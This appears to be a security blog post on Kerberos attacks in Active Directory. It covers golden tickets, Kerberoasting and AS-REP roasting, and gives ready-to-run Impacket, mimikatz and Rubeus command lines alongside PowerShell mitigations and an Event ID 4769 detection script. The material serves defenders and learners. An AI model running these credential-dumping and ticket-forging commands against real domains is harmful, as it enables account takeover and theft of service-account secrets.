👉🏻 What are Kerberos Attacks?
Kerberos is the predominant authentication protocol used in Microsoft Active Directory, replacing the less secure NTLM (New Technology LAN Manager). Domain users authenticate with tickets issued through the Key Distribution Center (KDC) and its Authentication Service (AS), which are typically hosted on domain controllers.
👉🏻 What topics are covered in the document?
- Kerberos Terminology
- Process Overview
- Golden Tickets
- Silver Tickets
- Kerberoasting
- AS-REP Roasting
- Mitigations for all Attacks
Practice-Verified Commands and Codes
1. Kerberoasting Attack Simulation
Use `Impacket` to extract service account hashes:
`python GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt`
2. Golden Ticket Attack
Generate a Golden Ticket using `mimikatz`:
`mimikatz # kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<KRBTGT_HASH> /ptt`
3. AS-REP Roasting
Use `Rubeus` to request AS-REP hashes:
`Rubeus.exe asreproast /user:<USER> /format:hashcat /outfile:asrep_hashes.txt`
4. Mitigation Commands
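- Enable AES encryption for Kerberos (the first command only clears the DES-only flag; the second sets the AES encryption types on the account):
`Set-ADAccountControl -Identity <USER> -UseDESKeyOnly $false`
`Set-ADUser -Identity <USER> -KerberosEncryptionType AES128,AES256`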
- Monitor Kerberos TGS requests:
`Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 }`
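Filtering on Event ID 4769 alone returns every service ticket request on the domain controller. The following added example (not part of the original post) narrows that stream to accounts that obtained RC4-encrypted tickets for several distinct non-computer services. The function names, the threshold of three services and the sample records are assumptions constructed for illustration.

```powershell
# Added example: flag Kerberoasting-style bursts in Event ID 4769 records.
# Function names, threshold and sample rows are constructed assumptions.
function ConvertFrom-TgsEvent {
    # Flatten a Get-WinEvent 4769 record into the fields used below.
    param([Parameter(ValueFromPipeline)] $EventRecord)
    process {
        $d = @{}
        ([xml]$EventRecord.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]@{
            Account     = $d['TargetUserName']
            ServiceName = $d['ServiceName']
            EncType     = $d['TicketEncryptionType']
            Status      = $d['Status']
            IpAddress   = $d['IpAddress']
        }
    }
}

function Find-Rc4TgsBurst {
    # Successful (0x0) RC4 tickets (0x17/0x18) for non-computer, non-krbtgt
    # services, grouped per requesting account and source address.
    param([object[]] $Records, [int] $MinDistinctServices = 3)
    $Records |
        Where-Object { $_.Status -eq '0x0' -and $_.EncType -in '0x17', '0x18' } |
        Where-Object { $_.ServiceName -notlike '*$' -and $_.ServiceName -ne 'krbtgt' } |
        Group-Object Account, IpAddress |
        ForEach-Object {
            $services = @($_.Group.ServiceName | Sort-Object -Unique)
            if ($services.Count -ge $MinDistinctServices) {
                [pscustomobject]@{
                    Account   = $_.Group[0].Account
                    IpAddress = $_.Group[0].IpAddress
                    Services  = $services -join ', '
                }
            }
        }
}

# Constructed sample records in the shape ConvertFrom-TgsEvent emits.
$sample = @'
Account,ServiceName,EncType,Status,IpAddress
jdoe@CORP.EXAMPLE,svc-sql,0x17,0x0,::ffff:10.0.0.5
jdoe@CORP.EXAMPLE,svc-web,0x17,0x0,::ffff:10.0.0.5
jdoe@CORP.EXAMPLE,svc-backup,0x17,0x0,::ffff:10.0.0.5
jdoe@CORP.EXAMPLE,FILESRV01$,0x12,0x0,::ffff:10.0.0.5
asmith@CORP.EXAMPLE,svc-web,0x17,0x0,::ffff:10.0.0.9
'@ | ConvertFrom-Csv
Find-Rc4TgsBurst -Records $sample
# Live use: Find-Rc4TgsBurst -Records (Get-WinEvent -FilterHashtable @{LogName='Security';Id=4769} | ConvertFrom-TgsEvent)
```

RC4 tickets are also issued legitimately to service accounts that have no AES keys, so baseline the environment before alerting on this output.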
What Undercode Say
Kerberos remains a cornerstone of secure authentication in Active Directory environments, but its complexity and widespread use make it a prime target for attackers. Understanding the nuances of Kerberos attacks, such as Golden Tickets, Silver Tickets, Kerberoasting, and AS-REP Roasting, is critical for cybersecurity professionals.
Golden Tickets exploit the KRBTGT account to grant unauthorized access, while Silver Tickets forge service tickets for specific services. Kerberoasting targets service accounts with weak passwords, and AS-REP Roasting preys on accounts with pre-authentication disabled.
To mitigate these threats, enforce strong password policies, enable AES encryption, and regularly monitor Kerberos TGS requests. Use tools like `Impacket`, `mimikatz`, and `Rubeus` for testing and detection. Additionally, disable unnecessary service accounts and ensure pre-authentication is enabled for all users.
By mastering these techniques and commands, you can better secure your environment against Kerberos-based threats. Stay vigilant, and always keep your systems updated with the latest security patches.
References:
Reported By: Mohamed Abdelgadr – Hackers Feeds


